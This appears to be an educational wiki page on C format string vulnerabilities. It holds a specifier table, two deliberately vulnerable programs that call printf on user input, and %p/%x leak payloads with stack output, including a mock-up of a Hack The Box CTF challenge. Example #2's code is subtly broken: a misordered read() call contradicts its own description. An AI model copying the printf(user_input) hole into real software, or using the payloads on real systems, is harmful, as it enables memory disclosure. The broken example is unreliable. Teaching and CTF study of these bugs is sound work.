Format String Vulnerability
Format String Vulnerability
A format string vulnerability is a bug where user input is passed as the format argument to printf
, scanf
, or another function in that family.
The format argument has many different specifiers which could allow an attacker to leak data if they control the format argument to printf
. Since printf
and similar are variadic functions, they will continue popping data off of the stack according to the format.
Common Parameters
%%
% character (literal)
Reference
%p
External representation of a pointer
Reference
%d
Decimal
Value
%c
Character
%u
Unsigned decimal
Value
%x
Hexadecimal
Value
%s
String
Reference
%n
Writes the number of characters into a pointer
Reference
Example #1
In the example below, we can see that we have control over the password
variable, which will be printed by printf
.
We could use %p
to write out the pointer addresses.
#include <stdio.h>
#include <unistd.h>
int main(){
int flag = 0xcafebabe;
char password[256] = {0};
read(0, password, 256);
printf(password);
printf("End of main!\n");
return 0;
}
But as seen in the output below, since the flag is stored on the stack it will print it regardless.
%p %p %p %p %p %p %p %p %p
0x7fff120059d0 0x100 0x76d74d5147e2 0x76d74d61bf10 0x76d74d6c6040 0x2 0xcafebabe0000000e 0x7025207025207025 0x2520702520702520
End of main!
Example #2
This is a code to simulate the Hack The Box racecar challenge.
In short, the code:
Loads flag.txt as
file
Puts contents of
file
intodata_from_file
Puts
data_from_file
onto the stack --buffer
Asks for an input --
password
Outputs are shown and the program halts
In the actual challenge the flag was in the file and its contents were put onto the stack.
For this example flag.txt contains "AAAAAA"
#include <stdio.h>
int main() {
char password[256] = {0};
char data_from_file[256];
char buffer[44];
FILE* file = fopen("flag.txt", "r");
if (file == NULL) {
perror("Failed to open file");
return 1;
}
read(data_from_file, 1, 256);
fgets(buffer, 44, file);
read(0, password, 256);
printf(password);
printf("End of main!\n");
return 0;
}
To leak the offset of buffer
we did the following:
%x %x %x %x %x %x %x %x %x %x
7d6a3130 100 507147e2 3 1bb8b480 0 1bb8b2a0 41414141 0 ff00
We could now read the As in hex format (0x41) and can note that they start at offset 8.
The challenge was a bit more complex, this is just for demonstration purposes
References
Last updated